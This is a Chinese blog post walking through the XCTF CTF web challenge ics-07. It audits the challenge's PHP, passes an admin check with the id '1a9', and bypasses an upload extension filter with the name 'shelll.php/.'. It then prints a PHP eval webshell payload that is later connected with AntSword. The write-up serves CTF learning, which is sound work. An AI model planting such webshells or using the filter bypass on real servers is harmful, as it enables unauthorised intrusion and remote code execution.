攻防世界 ics-07

最新推荐文章于 2024-07-21 22:49:36 发布
最新推荐文章于 2024-07-21 22:49:36 发布
阅读量481 收藏 1
点赞数 1
分类专栏: 攻防世界 文章标签: php 正则表达式 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/114011632
版权
  • ics-07 hint:工控云管理系统项目管理页面解析漏洞
  • 进入管理页面是个登录窗 左下角有个查看源码
 <?php
    session_start();
    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }
    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }
    ?>
  • 无论如何 该页面都会让你包含flag.php文件
  • 还有就是 page对应的是项目名称
 <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>
  • 对filename用了一个正则过滤
  • chdir函数改变当前目录 成功则返回True
  • 接着就是像当前目录写入文件 emmmm 我想到了文件上传一句话木马
<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>
  • floatval()返回变量的浮点值
  • substr()截取id的最后以为 必须是9
  • mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符
  • 整理了一下思路
  • page不重要 主要是上传的id满足要求获取SESSION[‘admin’]=True的权限
  • 之后绕过正则表达式进行文件上传一句话木马获取flag
  • 接下来就是解题了
  • 首先通过第三个函数去获取admin的权限
<?php
var_dump(floatval("1a9"));
?>
//float(1) 1!=="1" 值为true 完美符合第一轮的条件

在这里插入图片描述

  • 获取了admin权限后 要做的就是 前面想到的文件上传了
 <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>
  • 先分析一下正则表达式
  • /.+这个不用解释了吧
  • 接着.匹配. 后面匹配ph
  • (p[3457])?|t|tml)是个子表达式 匹配p3,p4,p5,p7 pt ptml
  • ?匹配前面的字符1次或0次
  • |指明两个直接选一下
  • $ 匹配字符串的结尾 /i表示不区分大小写
  • 所以该正则表达式匹配的是 xxxx.php xxx.php3 xxx.php4 xxx.php5 xxx.php5 xxx.phpt xxx.phptml
  • 绕过方式../filename.php/.或者filename.php/.
  • 绕过原理:文件名中不允许带有/ 因为/表示目录的分割符 在php中,如果保存的文件中含有/ 会自动省略/后面的内容,/后面的.是为了达到匹配最后一个.的效果
  • hackbar上传
  • con=<?php eval($_POST['shell']);phpinfo;?>&file=shelll.php/.
  • 蚁剑连接
    在这里插入图片描述
海上清辉
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4553
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
攻防世界web进阶区ics-07
gongjingege的博客
08-14 436
题目描述:工控云管理系统项目管理页面解析漏洞 打开靶机 根据题目描述,点击项目管理 点击view-source可以查看源码 大概有三部分 1, <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') {
ics-07—CTF
qq_40646572的博客
04-16 2226
审题 打开链接地址显示如下: 点击项目管理链接,转到目标网页 发现页面有一个view-source按钮(一开始没发现可以点击,打开源代码的时候发现,这是一个链接地址。) view_source页面代码如下: 通过代码审计,发现session会话要有admin用户的信息,才可以进行文件上传的操作。 那么首先需要在session会话中获取admin用户的身份,通过下面的代码审计,发现可以利用id 这个参数。 admin身份绕过 首先看到此处的代码,想着能不能使用sql注入的方式绕过,sql注入没能成功.
xctf攻防世界 Web高手进阶区 ics-07
l8947943的博客
01-01 612
1. 进入场景,查看环境 一顿狂点,项目管理可以打开,如图: 看到这个view-source,可以戳进去查看源码,如图: 2. 分析问题 这个题还是很中规中矩的,登录界面随便填写,查看url中的变化 也就是说page和id将会是解题的重要参数。 开始分析代码 <?php if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else {
攻防世界CTF | WP】ics-07
ethan18的博客
02-01 2187
攻防世界CTF | WP】ics-07题目思路查看界面 题目 思路 查看界面 打开题目,我们可以看到一个只有项目管理界面可以进行操作的网站,项目管理界面如下 我们看到有一个源代码链接,点击链接的源代码如下 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) &&
【愚公系列】2023年06月 攻防世界-Web(ics-07
时光隧道
06-15 4099
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。3.14在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。
攻防世界WEB】难度五星15分进阶题:ics-07
07-24 570
攻防世界WEB】五星15分
Web安全攻防世界09 ics-07(XCTF)
weixin_42789937的博客
01-29 956
Web安全攻防世界09 ics-07(XCTF),友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界hit-the-core,杂项misc
11-01
攻防世界hit-the-core,杂项misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127626829
[XCTF]ics-07
sGanYu
09-01 1096
工控云管理系统项目管理页面解析漏洞 打开链接,一个工控云管理系统,随意点击旁边的菜单,发现只有云平台项目管理中心可以进入 初始页面只有一个,可以找到一个view-source,点进去可以看到源码 考点:php代码审计、中间件解析漏洞、上传一句话木马连接 PHP代码审计 代码一共分为三部分 第一部分:提交的get参数page不为index.php即可 <?php session_start();//在用户登陆成功后,将用户特定标识存储到 sessio...
攻防世界----ics-07
qq_44418229的博客
07-26 399
攻防世界---ics-07 分析源码+正则
isc07
xiaoqi199915的博客
06-02 348
工控云管理系统项目管理页面解析漏洞 进入之后有一个view-source 进入 http://124.126.19.106:39693/view-source.php 审查源码 第一段 参数page存在且其值不等于index.php,才会包含flag.php 第二段 首先SESSION[′admin′],将_SESSION['admin'],将S​ESSION[′admin′],将con的内容写入到$file,但文件后缀名不可以为.php3/4/5/6/7/t/html 第三段 KaTeX parse er
攻防世界web进阶区ics-07详解
hxhxhxhxx的博客
08-07 1483
攻防世界web进阶区ics-07详解题目详解floatvalsubstr 题目 当然又是熟悉的界面,熟悉的ics题目,熟悉的只能点击一个页面 详解 这里进来有一个view-source 点击看看 是一堆代码。我们进行尝试审计 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]
ICS-07
weixin_52921802的博客
12-16 508
输入、输出 本章输入设备选择键盘,输出设备选择显示器 输入、输出的基本概念 设备寄存器(decice register):即使最简单的I/O设备,也至少包含两个寄存器: 一个用来保存跟计算机之间传输的数据; 另一个用来指示当前设备的状态信息。 内存映射I/O与专用I/O指令 指令访问I/O设备寄存器时,需要明确指明目标寄存器。通常有两种实现方法 采用专门的I/O指令来访问,即专用I/O指令 采用内存操作指令来完成I/O操作,即内存映射I/O 专用I/O指令就是设计好的操作码来确定其行为
Vue3+ element plus 前后分离admin项目安装教程
最新发布
luck332的专栏
07-21 577
前后分离admin项目安装基于 vue3.x + CompositionAPI + typescript + vite + element plus + vue-router-next + pinia,适配手机、平板、pc 的后台开源免费模板,希望减少工作量,帮助大家实现快速开发。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值